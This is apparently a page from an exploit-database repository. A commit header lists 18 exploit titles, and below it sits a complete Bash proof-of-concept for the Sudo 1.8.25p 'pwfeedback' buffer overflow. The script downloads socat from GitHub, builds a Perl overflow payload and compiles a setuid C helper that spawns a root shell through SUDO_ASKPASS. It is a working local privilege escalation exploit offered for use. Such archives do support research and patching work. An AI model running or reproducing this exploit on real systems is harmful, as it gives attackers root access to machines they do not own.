ea7a01d8fb
18 changes to exploits/shellcodes Sudo 1.8.25p - 'pwfeedback' Buffer Overflow (PoC) Sudo 1.8.25p - Buffer Overflow Torrent iPod Video Converter 1.51 - Stack Overflow DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path Disk Savvy Enterprise 12.3.18 - Unquoted Service Path Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow Sudo 1.8.25p - 'pwfeedback' Buffer Overflow OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution Microsoft SharePoint - Deserialization Remote Code Execution CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting WordPress InfiniteWP - Client Authentication Bypass (Metasploit)
52 lines
No EOL
1.3 KiB
Bash
Executable file
52 lines
No EOL
1.3 KiB
Bash
Executable file
#!/bin/bash
|
|
# We will need socat to run this.
|
|
if [ ! -f socat ];
|
|
then
|
|
wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
|
|
chmod +x socat
|
|
fi
|
|
|
|
cat <<EOF > xpl.pl
|
|
\$buf_sz = 256;
|
|
\$askpass_sz = 32;
|
|
\$signo_sz = 4*65;
|
|
\$tgetpass_flag = "\x04\x00\x00\x00" . ("\x00"x24);
|
|
print("\x00\x15"x(\$buf_sz+\$askpass_sz) .
|
|
("\x00\x15"x\$signo_sz) .
|
|
(\$tgetpass_flag) . "\x37\x98\x01\x00\x35\x98\x01\x00\x35\x98\x01\x00\xff\xff\xff\xff\x35\x98\x01\x00\x00\x00\x00\x00".
|
|
"\x00\x00\x00\x00\x00\x15"x104 . "\n");
|
|
EOF
|
|
|
|
cat <<EOF > exec.c
|
|
#include <sys/types.h>
|
|
#include <sys/stat.h>
|
|
#include <fcntl.h>
|
|
#include <sys/stat.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
|
|
int main(void)
|
|
{
|
|
printf("Exploiting!\n");
|
|
int fd = open("/proc/self/exe", O_RDONLY);
|
|
struct stat st;
|
|
fstat(fd, &st);
|
|
if (st.st_uid != 0)
|
|
{
|
|
fchown(fd, 0, st.st_gid);
|
|
fchmod(fd, S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);
|
|
}
|
|
else
|
|
{
|
|
setuid(0);
|
|
execve("/bin/bash",NULL,NULL);
|
|
}
|
|
return 0;
|
|
}
|
|
EOF
|
|
cc -w exec.c -o /tmp/pipe
|
|
./socat pty,link=/tmp/pty,waitslave exec:"perl xpl.pl"&
|
|
sleep 0.5
|
|
export SUDO_ASKPASS=/tmp/pipe
|
|
sudo -k -S id < /tmp/pty
|
|
/tmp/pipe |